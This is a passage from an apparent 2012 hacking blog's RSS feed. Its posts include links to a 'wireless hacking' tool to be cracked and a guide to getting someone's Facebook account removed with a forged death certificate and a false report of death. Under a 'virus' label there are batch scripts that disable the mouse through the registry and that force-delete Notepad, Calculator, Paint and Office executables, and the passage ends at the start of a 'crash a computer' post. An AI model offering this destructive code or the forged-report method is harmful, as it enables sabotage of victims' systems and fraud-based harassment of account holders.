&lt;p$1&gt;&lt;a href="http://www.mediafire.com/?j2vntwidnmk" style="background-color: #111111; color: #456773; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px; text-decoration: none;" target="_blank"&gt;&lt;span style="background-color: white;"&gt;http://www.mediafire.com/?j2vntwidnmk&lt;/span&gt;&lt;/a&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;&amp;nbsp;&amp;lt;—Install it and crack it as any other application.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;strong style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;Wireless Hacking Plug in + Manual Download:&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;a href="http://www.mediafire.com/?j2uuymzw3mt" style="background-color: #111111; color: #456773; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px; text-decoration: none;" target="_blank"&gt;&lt;span style="background-color: white;"&gt;http://www.mediafire.com/?j2uuymzw3mt&lt;/span&gt;&lt;/a&gt;&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #111111; color: #eeeeee; font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px;"&gt;&amp;nbsp;&amp;lt;— Run the application and read the manual to help you with process&lt;/span&gt; &lt;/span&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;p$1&gt;&lt;span style="background-color: white;"&gt;&lt;/span&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>[Guide] Close any Facebook account in 24 hours</title><link>http://latest-cracker.blogspot.com/2012/06/guide-close-any-facebook-account-in-24.html</link><category>Hack Facebook</category><pubDate>Fri, 8 Jun 2012 22:30:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-3250947203334291081</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="post-body entry-content" style="font-family: arial, verdana, sans-serif; font-size: 13px; line-height: 19px; margin: 20px 0px; padding: 0px;"&gt;&lt;div id="summary5508064058023272380"&gt;&lt;div dir="ltr" trbidi="on"&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="background-color: white; font-family: 'Monotype Corsiva';"&gt;Close FaceBook account(s)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.loanational.org/_images/facebook-logo.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;span style="color: black;"&gt;&lt;img border="0" src="http://www.loanational.org/_images/facebook-logo.png" style="border-bottom-left-radius: 8px; border-bottom-right-radius: 8px; border-top-left-radius: 8px; border-top-right-radius: 8px; border-width: 0px; padding: 8px;" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
Just Follow the steps:&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;Step 1&lt;/span&gt;&lt;/span&gt;&amp;nbsp;- Go to this url:&lt;br /&gt;
&lt;a href="http://www.facebook.com/help/contact.php?show_form=deceased" style="text-decoration: none;" target="_blank"&gt;http://www.facebook.com/help/contact.php...m=deceased&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;&lt;span style="font-style: italic;"&gt;Step 2&amp;nbsp;&lt;/span&gt;&lt;/span&gt;- Complete the Fields:&lt;br /&gt;
&lt;br /&gt;
Explain:&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Full Name:&lt;/span&gt;&amp;nbsp;Your Victims Full name(Name last name)&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Date of birth:&lt;/span&gt;&amp;nbsp;Go at his profile and click at Info tab and get his date of birth.&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Account Email Addresses:&lt;/span&gt;&amp;nbsp;Do the same thing, go to his profile and click on info tab and get his email addresses.&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Networks:&lt;/span&gt;&amp;nbsp;Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Web address of profile you would like to report:&lt;/span&gt;&amp;nbsp;Just go to his profile and copy the link in the address bar.&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Relationship to this person:&lt;/span&gt;&amp;nbsp;To make more believable select Immediate Family.&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Requested Action:&lt;/span&gt;&amp;nbsp;Remove Profile&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Proof Of Death:&lt;/span&gt;&amp;nbsp;This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image&lt;br /&gt;
Editor and just write in a blank field:&lt;br /&gt;
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image&lt;br /&gt;
Free Hosting like:&amp;nbsp;&lt;a href="http://imageshack.us/" style="text-decoration: none;" target="_blank"&gt;http://imageshack.us&lt;/a&gt;&lt;br /&gt;
And it's done ;)... Italian Death Certificate:&lt;br /&gt;
&lt;span style="font-weight: bold;"&gt;Additional Information:&lt;/span&gt;&amp;nbsp;Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;Step 3&lt;/span&gt;&lt;/span&gt;&amp;nbsp;- Click on Submit and then a message will appear:&lt;br /&gt;
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="clear: both;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="post-footer" style="font-family: arial, verdana, sans-serif; font-size: 12px; line-height: 19px; padding: 0px;"&gt;&lt;div class="post-footer-line post-footer-line-1"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>HOW TO UNLOCK LOCKED FILES IN YOUR SYSTEM</title><link>http://latest-cracker.blogspot.com/2012/06/how-to-unlock-locked-files-in-your.html</link><category>tricks</category><pubDate>Tue, 5 Jun 2012 13:30:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-7833373781886818024</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;p$1&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;div class="separator" style="background-color: white; clear: both; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNu5s-twKajDp0wMnuVUGJkTToKBR_22vRuXl4GTHAoF6KrKVZe26HeyqiYq5iZEKH7w8SDp1GrOjJxz_Kbr8MudxJpJOl8DOVe8q0c8gMbtBVjigLBYdjDk0sMdJalvyDmpLB8EHVdYA/s1600/images+%25283%2529.jpg" imageanchor="1" style="clear: left; color: black; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNu5s-twKajDp0wMnuVUGJkTToKBR_22vRuXl4GTHAoF6KrKVZe26HeyqiYq5iZEKH7w8SDp1GrOjJxz_Kbr8MudxJpJOl8DOVe8q0c8gMbtBVjigLBYdjDk0sMdJalvyDmpLB8EHVdYA/s200/images+%25283%2529.jpg" style="border: 1px solid rgb(234, 238, 227); margin: 0px 4px 4px 0px; max-width: 99%; padding: 6px;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p$1&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px;"&gt;Welcome to "HACKING begins - An approach to introduce people with the truth of HACKING", In this article I'll tell you how can you access denied file in your system, some times many of files are denied to access or unable to delete.&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 24px;"&gt;If you use a&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;a href="http://www.blogger.com/" name="more" style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;computer, you’ve probably come across at least one of the following messages:&lt;/span&gt;&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 24px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /&gt;&lt;br /&gt;
&lt;p$1&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 17px; line-height: 24px;"&gt;&lt;ul class="items-list" style="list-style: none; margin: 0px 0px 15px 32px; padding: 0px 0px 0px 20px;"&gt;&lt;li style="height: 24px; margin-left: 20px; padding: 0px 0px 7px 10px; vertical-align: top;"&gt;Cannot delete file: Access is denied.&lt;/li&gt;
&lt;li style="height: 48px; margin-left: 20px; padding: 0px 0px 7px 10px; vertical-align: top;"&gt;Make sure the disk is not full or write-protected and that the file is not currently in use.&lt;/li&gt;
&lt;li style="height: 24px; margin-left: 20px; padding: 0px 0px 7px 10px; vertical-align: top;"&gt;The source or destination file may be in use.&lt;/li&gt;
&lt;li style="height: 24px; margin-left: 20px; padding: 0px 0px 7px 10px; vertical-align: top;"&gt;The file is in use by another program or user.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="margin: 0px 0px 23px;"&gt;&lt;p$1&gt;These messages commonly appear when you’re trying to delete files deposited by a malware infection. Now its time to unlock these files.&lt;/p$1&gt;&lt;/div&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 24px;"&gt;&lt;h2 style="line-height: 30px; margin-bottom: 21px;"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6; font-size: medium;"&gt;FileASSASSIN&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;&lt;span class="Apple-style-span" style="color: #073763; font-size: xx-small;"&gt;&lt;u&gt;&lt;a href="http://www.ziddu.com/download/15317127/fa-setup.exe.html" style="color: black;"&gt;Download&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 17px; line-height: 24px;"&gt;Whatever the reason for the locked file, File ASSASSIN can remove it.&lt;/span&gt;&lt;br /&gt;
&lt;div style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;p$1&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: 17px; line-height: 24px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;p$1&gt;&lt;div style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;p$1&gt;&lt;span class="Apple-style-span" style="font-size: 17px; line-height: 24px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Warning:&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: 17px; line-height: 24px;"&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;Please use caution with FileASSASSIN as deleting critical system files may cause system errors.&lt;/span&gt;&lt;/span&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;p$1&gt;&lt;div style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;p$1&gt;&lt;span class="Apple-style-span" style="color: #444444;"&gt;&lt;span class="Apple-style-span" style="font-size: 17px; line-height: 24px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="background-color: white; color: #2f312a; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"&gt;&lt;p$1&gt;&lt;span class="Apple-style-span" style="color: #222222; line-height: 18px;"&gt;&lt;/span&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/div&gt;&lt;/p$1&gt;&lt;p$1&gt;&lt;/p$1&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNu5s-twKajDp0wMnuVUGJkTToKBR_22vRuXl4GTHAoF6KrKVZe26HeyqiYq5iZEKH7w8SDp1GrOjJxz_Kbr8MudxJpJOl8DOVe8q0c8gMbtBVjigLBYdjDk0sMdJalvyDmpLB8EHVdYA/s72-c/images+%25283%2529.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Virus coding to Disable the mouse</title><link>http://latest-cracker.blogspot.com/2012/06/virus-coding-to-disable-mouse.html</link><category>virus</category><pubDate>Tue, 5 Jun 2012 13:04:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-8871622385176941871</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; margin-bottom: 0.5em; margin-top: 0.5em; text-align: -webkit-auto;"&gt;&lt;/div&gt;&lt;div dir="ltr" style="color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0PP8zRsH87UJKYSPK2Kqlav4Z86M8yYDkTYva5cXS_wsjHIMy-H0q9A08OBeVtphy9TYJSy835SEP9zCq4sPRRMnwC8dmq4rX99dkn1qkkZBOrRzZIxOwV85F_-5AfU81dBXQVQBwNk/s1600/mouse.jpg" imageanchor="1" style="color: #ab6f07; font-family: Georgia, 'Times New Roman', Times, serif; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0PP8zRsH87UJKYSPK2Kqlav4Z86M8yYDkTYva5cXS_wsjHIMy-H0q9A08OBeVtphy9TYJSy835SEP9zCq4sPRRMnwC8dmq4rX99dkn1qkkZBOrRzZIxOwV85F_-5AfU81dBXQVQBwNk/s200/mouse.jpg" style="border: 0px solid rgb(114, 242, 242); margin: 1em;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b&gt;Description:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;This is harmless &lt;/span&gt;&lt;span style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;code &lt;/span&gt;&lt;span style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;to temporary disable the mouse by editing the registry. You can enable it again with no&amp;nbsp;hassle.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="background-color: #fce0b1; background-position: 0% 0%; border: 1px solid rgb(249, 195, 103); color: #151009; font-family: Georgia, 'Times New Roman', Times, serif; margin: 10px 10px 10px 50px; padding: 5px 5px 5px 37px;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif; font-weight: bold;"&gt;rem ---------------------------------&lt;br /&gt;
rem Disable Mouse&lt;br /&gt;
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"&lt;br /&gt;
reg delete %key%&lt;br /&gt;
reg add %key% /v Start /t REG_DWORD /d 4&lt;br /&gt;
rem ---------------------------------&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b&gt;Testing:-&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;1.Copy the code above, paste in in notepad, and save it with any name having extension .bat.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;2. Click the bat file to disable Mouse.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #819292; color: red;"&gt;&lt;span style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;span style="font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;b style="background-color: white;"&gt;Enable Mouse Again:-&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;To enable Mouse again, copy the code below, make a bat file and click on it.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: Georgia, 'Times New Roman', serif; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-weight: bold; line-height: 18px;"&gt;rem ---------------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-weight: bold; line-height: 18px;"&gt;rem Enable Mouse&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-weight: bold; line-height: 18px;"&gt;set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-weight: bold; line-height: 18px;"&gt;reg delete %key%&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-weight: bold; line-height: 18px;"&gt;reg add %key% /v Start /t REG_DWORD /d 1&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-family: Georgia, 'Times New Roman', serif; font-weight: bold; line-height: 18px;"&gt;rem ---------------------------------&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0PP8zRsH87UJKYSPK2Kqlav4Z86M8yYDkTYva5cXS_wsjHIMy-H0q9A08OBeVtphy9TYJSy835SEP9zCq4sPRRMnwC8dmq4rX99dkn1qkkZBOrRzZIxOwV85F_-5AfU81dBXQVQBwNk/s72-c/mouse.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Code to Delete notepad, calc, paint, excel, word, outlook</title><link>http://latest-cracker.blogspot.com/2012/06/code-to-delete-notepad-calc-paint-excel.html</link><category>virus</category><pubDate>Tue, 5 Jun 2012 10:18:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-8027576853539601124</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; margin-bottom: 0.5em; margin-top: 0.5em; text-align: -webkit-auto;"&gt;&lt;/div&gt;&lt;div dir="ltr" style="color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0WqLRU5NwF57-OPOsxJIIUJ6rZp7tbxV5tdr2WKLOR5jtAS5QfR6rH3TvRyJoLLUVS6I4LvDqPfJ_EMutrRE6wIzzX4pJ6hCpdGFmALqTa35sbZYUHbDJbkkSQXPOw_FjW6yEp-ytkI0/s1600/delete" imageanchor="1" style="color: #ab6f07; font-family: Georgia, 'Times New Roman', Times, serif; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0WqLRU5NwF57-OPOsxJIIUJ6rZp7tbxV5tdr2WKLOR5jtAS5QfR6rH3TvRyJoLLUVS6I4LvDqPfJ_EMutrRE6wIzzX4pJ6hCpdGFmALqTa35sbZYUHbDJbkkSQXPOw_FjW6yEp-ytkI0/s200/delete" style="border: 0px solid rgb(114, 242, 242); margin: 1em;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote style="background-color: #fce0b1; background-position: 0% 0%; border: 1px solid rgb(249, 195, 103); color: #151009; font-family: Georgia, 'Times New Roman', Times, serif; margin: 10px 10px 10px 50px; padding: 5px 5px 5px 37px;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="codeblock" style="border: 1px dashed rgb(204, 204, 204); margin: 0px; padding: 4px;"&gt;&lt;div class="body" dir="ltr"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;code style="display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"&gt;rem ---------------------------------&lt;br /&gt;
rem Delete Notepad&lt;br /&gt;
tskill notepad&lt;br /&gt;
del /f /q "%windir%\system32\notepad.exe"&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem Delete Calculator&lt;br /&gt;
tskill calc&lt;br /&gt;
del /f /q "%windir%\system32\calc.exe&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem Delete Paint&lt;br /&gt;
tskill mspaint&lt;br /&gt;
del /f /q "%windir%\system32\mspaint.exe"&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem Delete Excel&lt;br /&gt;
tskill excel&lt;br /&gt;
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem Delete Word&lt;br /&gt;
tskill WINWORD&lt;br /&gt;
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE"&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem ---------------------------------&lt;br /&gt;
rem Delete Outlook&lt;br /&gt;
tskill outlook&lt;br /&gt;
del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\OUTLOOK.EXE"&lt;br /&gt;
rem ---------------------------------&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; color: red; font-family: Verdana, Arial, sans-serif; line-height: 18px;"&gt;[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]&lt;/span&gt;&lt;span style="background-color: #819292;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0WqLRU5NwF57-OPOsxJIIUJ6rZp7tbxV5tdr2WKLOR5jtAS5QfR6rH3TvRyJoLLUVS6I4LvDqPfJ_EMutrRE6wIzzX4pJ6hCpdGFmALqTa35sbZYUHbDJbkkSQXPOw_FjW6yEp-ytkI0/s72-c/delete" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Batch code to Crash a computer</title><link>http://latest-cracker.blogspot.com/2012/06/batch-code-to-crash-computer.html</link><category>virus</category><pubDate>Tue, 5 Jun 2012 10:13:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-8727672149953128296</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #819292; color: #262c2c; font-family: verdana, Arial, sans-serif; font-size: 13px; text-align: -webkit-auto;"&gt;&lt;/span&gt;&lt;br /&gt;
